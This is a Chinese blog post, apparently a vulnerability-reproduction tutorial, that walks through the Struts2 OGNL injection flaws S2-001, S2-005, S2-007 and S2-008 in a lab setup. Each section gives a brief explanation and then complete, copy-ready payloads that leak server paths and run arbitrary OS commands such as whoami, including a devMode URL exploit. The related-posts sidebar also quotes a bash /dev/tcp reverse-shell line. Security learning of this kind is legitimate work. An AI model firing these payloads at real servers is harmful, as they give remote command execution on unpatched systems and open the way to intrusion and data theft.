Struts2命令执行

最新推荐文章于 2024-05-13 03:52:06 发布
最新推荐文章于 2024-05-13 03:52:06 发布
阅读量305 收藏 1
点赞数
分类专栏: 网络安全-渗透篇 文章标签: struts web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Massimo__JAVA/article/details/131731465
版权

一、介绍

Struts2是一个基于MVC设计模式的JavaWeb应用框架,是在Struts和WebWork的技术的基础上进行合并的全新框架。

二、漏洞复现

S2-001(OGNL循环解析导致的RCE漏洞)

原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value} 对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行。

启动环境
在这里插入图片描述访问
在这里插入图片描述漏洞验证:在密码处输入%{‘123’},点击提交
在这里插入图片描述
成功解析OGNL表达式,说明存在漏洞
在这里插入图片描述
漏洞利用:
获取tomcat路径
exp:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

在这里插入图片描述
获取网站真实路径
exp:

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

在这里插入图片描述
命令执行,执行whoami命令(可替换命令)
exp:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

在这里插入图片描述

S2-005

漏洞原理:S2-005漏洞源于S2-003(受影响版本:低于Struts 2.0.12), struts2会将 http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问Struts的对象, Struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)就可以绕过安全限制。

环境搭建
在这里插入图片描述
访问
在这里插入图片描述
poc:

?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

抓包
在这里插入图片描述查看文件
在这里插入图片描述

S2-007

漏洞原理:S2-007漏洞一般出现在表单处,当配置了验证规则-validation.xml时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次OGNL表达式解析并返回。

环境搭建
在这里插入图片描述
访问
在这里插入图片描述注意:如果报404错误,只需要去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

当户提交age为字符串非整形数值时,后端用代码拼接" ’ “+value+” ’ "然后对其进行OGNL表达式解析。所以,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似SQLi注入单引号拼接的方式即可注入任意OGNL达式。

在age中输入’+(1+1)+',点击登录,age框返回数字,证明漏洞存在
在这里插入图片描述
执行任意命令EXP

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())) + '

在这里插入图片描述
可以把EXP中exec(‘whoami’)里的whoami改为想要执行的命令,如exec(‘id’)

s2-008

漏洞原理:S2-008涉汲多个漏洞,Cookie 拦截器错误配置可造成OGNL表达式执行,但是由于大多Web容器(如Tomcat)对Cookie名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。
另一个比较鸡肋的点就是在struts2应用开启devMode模式后会有多个调试接口能够直接查看对象信息或直接执行命令,但是这种情况在生产环境中几乎不可能存在,所以还是很鸡肋。

环境搭建:
在这里插入图片描述访问
在这里插入图片描述POC:

/devmode.action?debug=command&expression=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=whoami

直接在url后添加即可
在这里插入图片描述

Massimo_ycw
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2远程命令执行验证工具
11-22
Struts2漏洞检查工具,可快速检测struts命令执行漏洞,支持批量导入验证,存在可利用的漏洞后,可远程执行命令及文件上传等操作。方便管理人员了解其危害。
墨者 - Struts2 命令执行系列
吃肉唐僧的博客
06-30 2901
前言 刷了好几道Struts2远程代码执行漏洞,发觉虽然触发不同,但是本质道理一样。所以整合一下目前刷过的Struts2系列漏洞。以后刷了新的再补充。 ongl 表达式 Struts2 命令执行的原因都是是通过 Ognl 表达式执行 java 代码,最终实现命令执行。所以应该需要先了解 ognl 表达式 。 此处引用http://www.zerokeeper.com/...
struts2 命令执行(CVE-2013-1965)(1)
最新发布
2401_84971615的博客
05-13 295
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Struts执行流程
LFSenior
03-03 3549
Struts执行流程 服务器启动: 1、加载项目web.xml 2、创建Struts核心过滤器对象,执行filter-->init(); i. Struts-default.xml    核心功能初始化 ii. Struts-plugin.xml   Struts相关组件 iii. Struts.xml         用户编写的配置文件 访问: 3、用户访问Action,服务器根
struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution
weixin_34309435的博客
07-12 374
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description OGNL provides, among other features, extensive expression evaluatio...
struts2 命令执行(CVE-2013-1965)
m0_74294234的博客
04-07 355
其中的"bash -i >%26 /dev/tcp/ip/port 0>%261"中的ip指的是vps的地址,port指的是你开启的监听端口。3:开启监听端口(我这里开启8888)并发送burpsuite中的重发器内容,若出现500状态码则是发送成功。小tips:如果你的监听一直失败:可能是你的监听没有打开,你需要在你的vps服务器上打开你的所有端口。输入指令:find / -name flag*即可得到flag。payload参考的是csdn的一位大佬的笔记。一:工具:burpsuite、vps服务器。
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
struts2远程命令执行环境包
10-09
struts2远程命令执行环境war包,想要深入学习深入到代码层的童鞋可以下载在本地搭建使用。
struts2漏洞利用工具
07-03
然而,Struts2在历史上曾出现过一系列的安全漏洞,其中一些是高危的,允许攻击者执行远程代码或控制系统。这个"Struts终极漏洞利用工具"显然旨在帮助安全研究人员和管理员检测和测试Struts2应用是否存在这些已知漏洞...
struts2远程命令执行环境搭建及录屏
10-09
struts2远程命令执行漏洞环境搭建以及录屏
struts2之开发模式(devMode)
11-03 489
在实际应用开发或者是产品部署的时候,对应着两种模式:开发模式(devMode)和产品模式(proMode);在一些服务器或者框架中也存在着这两种模式,例如:tomcat、struts2等(其他的有待学习,呵呵),在这两种不同的模式下,他们运行的性能方面有很大的差异,前面曾对tomcat产品部署作过介绍,下面主要介绍一下struts2在产品部署时要做的配置: 在struts.properties或...
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135)
qq_51577576的博客
11-19 713
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
Struts2_013_RCE CVE-2013-1966 漏洞复现
ADummy的博客
02-04 1598
Struts2_013_远程代码执行 by ADummy 0x00利用路线 ​ 直接url执行payload,由于浏览器url输入框的长度有限,可以使用Hackbar插件,或burpsuite抓包测试。 0x01漏洞介绍 ​ <s:a>includeParams=“all”>Click here.</s:a>,这个是struts2标签库的a标签,该标签会在页面上显示当前URL Struts2标签库中的url标签和a标签的includeParams这个属性,代表显示请求访
linux 访问路径,Struts2 Action的访问路径
weixin_42352351的博客
05-05 198
1.Action的访问路径扩展名缺省以.action结尾,请参考:default.properties文件,可以通过配置改变这一点:上述配置,将使得可以通过.action或.do或.webwork访问Action对象访问路径的容错能力比如:我们配置某个package的namespace="/simple",在这个package里面有一个action的name是hello那么,我们可以通过:/si...
CVE-2017-12611 Struts2远程命令执行漏洞复现总结
qq_35622443的博客
01-11 3770
## CVE-2017-12611 Struts2-053' ### 前置知识 ``` web服务器 提供HTTP服务,传送静态页面 1、Apache Http Server(由Apache提供) 2、IIS(由Microsoft提供) 3、nginx(由NGINX,Inc。提供,发音类似于“Engine X”) 4、GWS(由谷歌提供,谷歌网络服务器的简称) 应用服务器 为应用程序提供可以调用的方法 1、WebLogic(Oracle 甲骨文公司) 2、Tomcat(Apache...
墨者Apache Struts2远程代码执行漏洞(S2-015)题解
zr1213159840的博客
01-08 2547
这题在网上搜索后,发现是这么进行操作的 首先在地址后面添加 ${1+2}.action 即访问 http://219.153.49.228:43186/${1+2}.action 发现存在回显 然后我们构造以下信息,访问当前的文件夹,发现key.txt %24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDecla
Struts2的devMode
Tomcat那些事儿
04-10 135
今天在debug Struts2的源码的时候发现,当在struts.xml中配置了devMode为true时,源码中会把设置以下几项: [code="java"]if ("true".equalsIgnoreCase(props.getProperty(StrutsConstants.STRUTS_DEVMODE))) { props.setProp...
关于Struts2中的struts.devMode
筚路蓝缕 以启山林
07-18 892
devMode模式是开发模式,开启它则默认开启了i18n.reload、configuration.xml.reload。 ### when set to true, Struts will act much more friendly for developers. This ### includes: ### - struts.i18n.reload = true ### - struts.c
linux 升级 struts2,Struts2.0 框架搭建步骤详解
weixin_39615643的博客
05-12 415
实现了MVC思想的struts框架,主要分三层结构,即:view->controller->model,三者互相传递数据,实现了数据在前台和后台的转换,验证,展示,存储。搭建struts框架的步骤如下:1.在myeclipse中新建Java项目,删除项目中的源文件src,建立普通文件,将Struts解压后的jar包复制在新建的普通文件夹中。2.新建web项目,右键选择build pat...
apache struts2框架命令执行漏洞(s2-045、s2-046)
01-11
Apache Struts2框架是一种流行的开源Web应用程序开发框架,但曾经发生过多个命令执行漏洞,其中包括s2-045和s2-046漏洞。 s2-045漏洞源于在处理远程表达式语言(OGNL)时存在安全漏洞,攻击者可以利用构造特定的HTTP请求发送恶意代码,导致服务器执行该恶意代码,从而获取系统权限。 而s2-046漏洞则是由于Struts2框架中对传入参数的处理不当,攻击者可以通过构造特定的HTTP请求,触发服务器执行恶意代码。 这两个漏洞都存在严重的安全风险,可能导致服务器受到攻击,甚至导致系统被入侵。为了防范这些漏洞,用户应该及时更新Struts2框架的最新版本,开发人员也需要对传入的参数进行严格的验证和过滤,避免恶意代码的执行。此外,安全团队也应该定期对服务器进行安全漏洞扫描和修复,以确保系统的安全性。 总之,对于Apache Struts2框架的命令执行漏洞,我们需要重视并采取有效的措施来防范和修复,以确保系统的安全性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值